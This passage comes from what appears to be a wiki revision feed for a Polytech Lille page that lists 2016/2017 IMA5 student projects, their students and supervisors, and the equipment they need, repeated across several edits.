  &amp;lt;td&amp;gt; Samuel Tranchet (Entreprise) / Thomas Vantroys (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P44 Identification d'un robot mobile ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Michel MIKHAEL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Midzodzi PEKPE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P47 Développement d'une interface cerveau-ordinateur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Victor CHARNET &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; C. Lecocq (Ecole) F. Cabestaing (Labo) A. Depres (Labo)&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P57 Robotisation d'un poste de production de pièces à base de fil métallique ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Audrey AFFOYON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise CONRARD &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P59 Popsell : application mobile]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Quentin GRUSON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / François Vandeplanque (Popsell) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
 &amp;lt;td&amp;gt;[[P64  Sécurité de l'IOT ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cédric DUVAL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) / SNCF&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P20 Conception d'un périphérique USB de type &amp;quot;gadget&amp;quot;]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Florian Giovannangeli &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Matériel nécessaires ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Matériel&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr&amp;gt;P15&amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr&amp;gt;2 téléphones Android&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33705</id>
		<title>Projets IMA5 2016/2017</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33705"/>
				<updated>2016-09-26T11:55:01Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Matériel nécessaires */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Merci de référencer vos pages de projets ici. Merci aussi d'uniformiser vos formats que ce soit en regardant la présentation des projets déjà créés ou en allant modifier le format des précédents si votre façon de faire vous semble la meilleure. Dans tous les cas un minimum de communication entre les binômes est conseillée.&lt;br /&gt;
&lt;br /&gt;
Toutes les sources doivent être déposées sur notre archive GIT. Le service est disponible à l'URL [https://archives.plil.fr archives.plil.fr]. Connectez-vous avec vos identifiants Polytech'Lille. Sauf indication contraire de vos encadrants, rendez le projet public et mettez le lien sur votre Wiki. Vous pouvez trouver de la documentation sur ce système d'archives sur ce [https://git-scm.com/book/fr/v1 site].&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Elèves&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Encadrant Ecole&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapport décembre&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapports finaux&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Vidéo&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P1 Automatisation de tests de validation d'un logiciel embarqué]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas ROJ / Maxime SZWECHOWIEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Julien SPANNEUT (SNCF) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P7 Régulation temps réel sur réseau sans fil ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Morgan OBEISSART / Vincent ROBIC &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alexandre BOE / Thomas VANTROYS &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P14 Conversion DC-DC à liaison AC et circuit L-C-L]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Nicolas WEGRZYN&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Philippe DELARUE&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P15 Entreprise : Développement d'une application iOS et Android ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Loïc DELECROIX / Julien JOIGNAUX &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Béatrice CADET (entreprise) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P16 Réaliser deux trackers GPS permettant de suivre à distance le trajet d'un coureur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Valentin Taffin / Alexandre Cuadros &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P19 Relai Ethernet Lora ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cong CHEN / Sonia NDUWAYO &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P23 Poste ébavurage de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Corentin CASIER / Jordan RAZAFINDRAIBE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P24 Contrôle qualité de la production de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alex JULITA / Matthier HERWEGH &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P31 Partition HTTP/TLS pour Pepin]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Mageshwaran SEKAR &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Julien IGUCHI-CARTIGNY&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P39 Ajouter de nouvelles interactions à la solution Tezeos  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Nathan RICHEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Samuel Tranchet (Entreprise) / Thomas Vantroys (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P44 Identification d'un robot mobile ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Michel MIKHAEL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Midzodzi PEKPE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P47 Développement d'une interface cerveau-ordinateur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Victor CHARNET &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; C. Lecocq (Ecole) F. Cabestaing (Labo) A. Depres (Labo)&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P57 Robotisation d'un poste de production de pièces à base de fil métallique ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Audrey AFFOYON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise CONRARD &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P59 Popsell : application mobile]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Quentin GRUSON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / François Vandeplanque (Popsell) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
 &amp;lt;td&amp;gt;[[P64  Sécurité de l'IOT ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cédric DUVAL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) / SNCF&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P20 Conception d'un périphérique USB de type &amp;quot;gadget&amp;quot;]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Florian Giovannangeli &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Matériel nécessaires ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Matériel&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;P15&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;2 téléphones Androïd&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33704</id>
		<title>Projets IMA5 2016/2017</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33704"/>
				<updated>2016-09-26T11:54:08Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Répartition des binômes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Merci de référencer vos pages de projets ici. Merci aussi d'uniformiser vos formats que ce soit en regardant la présentation des projets déjà créés ou en allant modifier le format des précédents si votre façon de faire vous semble la meilleure. Dans tous les cas un minimum de communication entre les binômes est conseillée.&lt;br /&gt;
&lt;br /&gt;
Toutes les sources doivent être déposées sur notre archive GIT. Le service est disponible à l'URL [https://archives.plil.fr archives.plil.fr]. Connectez-vous avec vos identifiants Polytech'Lille. Sauf indication contraire de vos encadrants, rendez le projet public et mettez le lien sur votre Wiki. Vous pouvez trouver de la documentation sur ce système d'archives sur ce [https://git-scm.com/book/fr/v1 site].&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Elèves&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Encadrant Ecole&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapport décembre&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapports finaux&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Vidéo&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P1 Automatisation de tests de validation d'un logiciel embarqué]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas ROJ / Maxime SZWECHOWIEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Julien SPANNEUT (SNCF) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P7 Régulation temps réel sur réseau sans fil ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Morgan OBEISSART / Vincent ROBIC &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alexandre BOE / Thomas VANTROYS &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P14 Conversion DC-DC à liaison AC et circuit L-C-L]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Nicolas WEGRZYN&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Philippe DELARUE&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P15 Entreprise : Développement d'une application iOS et Android ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Loïc DELECROIX / Julien JOIGNAUX &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Béatrice CADET (entreprise) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P16 Réaliser deux trackers GPS permettant de suivre à distance le trajet d'un coureur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Valentin Taffin / Alexandre Cuadros &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P19 Relai Ethernet Lora ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cong CHEN / Sonia NDUWAYO &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P23 Poste ébavurage de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Corentin CASIER / Jordan RAZAFINDRAIBE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P24 Contrôle qualité de la production de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alex JULITA / Matthier HERWEGH &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P31 Partition HTTP/TLS pour Pepin]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Mageshwaran SEKAR &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Julien IGUCHI-CARTIGNY&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
